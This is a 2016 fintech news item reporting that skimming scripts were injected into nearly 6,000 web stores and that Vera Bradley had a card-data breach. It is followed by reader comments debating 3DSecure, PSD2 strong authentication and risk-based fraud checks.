Hackers hit 6000 web stores to steal card data

Hackers hit 6000 web stores to steal card data

Crooks have injected malicious code into 5925 online stores, enabling them to steal payment card details, according to a Dutch developer.

Willem De Groot says that hackers have been gaining access to the stores' source code using unpatched software flaws, and installing JavaScript wiretaps to steal card data. The information makes its way to an off-shore collection server - usually in Russia, says De Groot - before being put up for sale on the dark web for around $30 a card.

De Groot scanned a batch of 255,000 online stores last November, when he first heard about the scam. At the time he found 3501 compromised sites but by this September the number of victims had risen to 5925 and included Audi, pop star Bjork and Washington Cathedral.

Separately, fashion retailer Vera Bradley says that it has been told by law enforcement about a data breach that puts customer card details at risk. Cards used at the firm's shops between the end of July and end of September may have been affected.

Crooks appear to have accessed Vera Bradley's payment processing system and installed a program designed to find card numbers, cardholder names, expiration dates, and internal verification codes via mag stripes.

Comments: (10)

A Finextra member
A Finextra member 14 October, 2016, 14:08Be the first to give this comment the thumbs up 0 likes

Merchants protected by 3DSecure  or its big data successors will not be too worried -  merchants who are not embracing  3DS should be concerned. 

Ketharaman Swaminathan
Ketharaman Swaminathan - GTM360 Marketing Solutions - Pune 14 October, 2016, 16:351 like 1 like

Merchants protected by 3DS will have bigger worries - like how to pay their bills.

Mitigating Fraud Does Not Pay The Bills

A Finextra member
A Finextra member 16 October, 2016, 08:171 like 1 like Oddly all the merchants in the U.K. That use 3DS pay their bills. UK consumers still buy online with confidence. The uk is one of the worlds most advanced ecommerce markets. Has very low fraud rates and low interchange too. By using 3DS and AVS They Also stop fraudsters from paying their bills OR subsidise other illegal activity. You seem to have a major downer on any effective counter fraud solution, POS or ecommerce. Why is that?
Ketharaman Swaminathan
Ketharaman Swaminathan - GTM360 Marketing Solutions - Pune 16 October, 2016, 11:00Be the first to give this comment the thumbs up 0 likes

Come out of anonymity if you expect me to answer personal questions.

Jan-Olof Brunila
Jan-Olof Brunila - Swedbank - Stockholm 17 October, 2016, 09:58Be the first to give this comment the thumbs up 0 likes

E comm crooks now need to make their last push in the EU and anybody active in  ecommerce needs to prepare for the new rules. In 2018 the updated payment services directive including strong customer authentication mandate (PSD2 + SCA) will demand a super-3DS with strong two factor authentication of both the payer consent + the amount. If not in place, payer account service providers (card issuers and others) must decline transaction attempts, also from e comm merchants outside the EU if the payer has an EU area payment account... Furthermore there will be penalties for any business that is negligent with personal data security - and a card number is personal data. The e commerce is becoming main-stream.  

A Finextra member
A Finextra member 17 October, 2016, 10:171 like 1 like

Hi Jan Olof, its interesting that in the UK (and possibly elsewhere) that  CA/Arcot's,  issuer side, 3DSecure  solution is using 'big data' to completely waive the 3DS password challenge and reply process...  

The decisioning (Authorise - Challenge - Decline)  is based on historic consumer behaviour and the intelligent assessment of threat.  I am not here to sell CA services, but as a consumer of them, via my bank (First Direct/HSBC), I am a huge fan,these transactions are frictionless but authenticated to a very high level of confidence for myself and the merchant.

Jan-Olof Brunila
Jan-Olof Brunila - Swedbank - Stockholm 17 October, 2016, 10:37Be the first to give this comment the thumbs up 0 likes

Dear David, The EBA  circulated regulatory tech standards doc for strong customer authentication specially comments on that risk based authentication is not allowed when the SCA-RTS go live in 2018. So from the go-live date there is a legislation that backs up the demand for strong two factor or biometric authentication (with afree zone for less than 10 Euro e comm payments)! If we believe that the EU authorities are going to realize this legislation according to plan, we now need to start figuring out how we implement it in a user friendly way.


Ketharaman Swaminathan
Ketharaman Swaminathan - GTM360 Marketing Solutions - Pune 17 October, 2016, 18:32Be the first to give this comment the thumbs up 0 likes

Would be interesting to see the impact of SCA-RTS on recurring payments. The Indian banking regulator mandated "explicit 2FA" via 3DS for all online card payments a few years ago. Apart from increasing friction and reducing conversion for one-off online card payments, the mandate virtually killed companies whose business model relies on monthly subscriptions (e.g. SAAS, media) - you can imagine the friction involved in individually having to two-factor authenticate 12 payments a year for each subscription service a customer has signed up for. Many subscription-based companies shifted their domicile overseas so that they can use ePGs that don't insist on 2FA; many customers - like me - opted for overseas service providers just to escape the onerous 2FA payments every month. A month ago, the regulator announced exemption of 2FA: Now only the first of the 12 months' payments is subject to 2FA. The remaining 11 monthly payments can happen without 2FA. The subscription industry has heaved a sigh of relief. I wonder how the EU subscription industry will react to SCA-RTS.

Hitesh Thakkar
Hitesh Thakkar - SME - Fintech startups (APAC and Africa) - India 17 October, 2016, 18:42Be the first to give this comment the thumbs up 0 likes

Fraud Prevention and risk management has become really costly and matter of business case to monitise it. Refer the recent PCI DSS compliance impacting in UK.

A Finextra member
A Finextra member 18 October, 2016, 09:09Be the first to give this comment the thumbs up 0 likes

It is true; the EBA are discussing the future of risk-based authentication "as we know it". That, however, does not mean the end for risk-based authentication. The technology we refer to as risk-based authentication is a sophisticated approach to trusted devices and shopping behaviour, which will be needed more than ever in the constant battle to secure payments. Already fraudster's are harvesting victims fingerprints and finding inventive ways to hack selfie technology. The EBA's guidelines are pretty simple; they require a two-factor approach to authenticating online transactions,  

Something:   1. You have 2. You are 3. You know  

The device is something you have; risk-based can intelligently confirm the device is trusted and behaving in a way that is indicative of a consumer's normal behaviour, and more importantly spot fraudulent patterns and anomalies. Recently a fraud attempt was made on my credit card; the Bank was able to detect the transactions as fraudulent, even though the amounts were below £10 by seeing an untrusted device in a strange location. I don't use the card very often so two transactions in quick succession set off an alert. Risk-based authentication takes care of the 1st factor verifying the cardholder is in possession of the device.     

Let's look at the second factor:  

Fingerprint - something you are 

Dynamic knowledge questions - something you know 

Selfies - something you are 

One-time pin - something you know 

Dynamic CVV - something you know 

App based push notification - something you know  

The truth is risk-based will just change its purpose, today it has been implemented to reduce inconvenience to cardholders, reducing the frequency they have to enter their password and let's be honest passwords have been a real pain causing unacceptable levels of abandonment through forgotten credentials. 100% challenge, however, if the challenge is a fingerprint or something else that is easy, is not such a big deal, or asking someone click yes or no to "are you in Starbucks." We can all agree it is much less painful than a blocked card, and a call to the fraud department to unblock it. But to avoid serious authentication overkill, risk-based offers one of two factors to be invisible. 

All that said the EBA guidelines are not final. Many banks are lobbying against the idea of 100% challenge. Either way intelligent machine learning approach to anomaly detection and device trust will not be going away.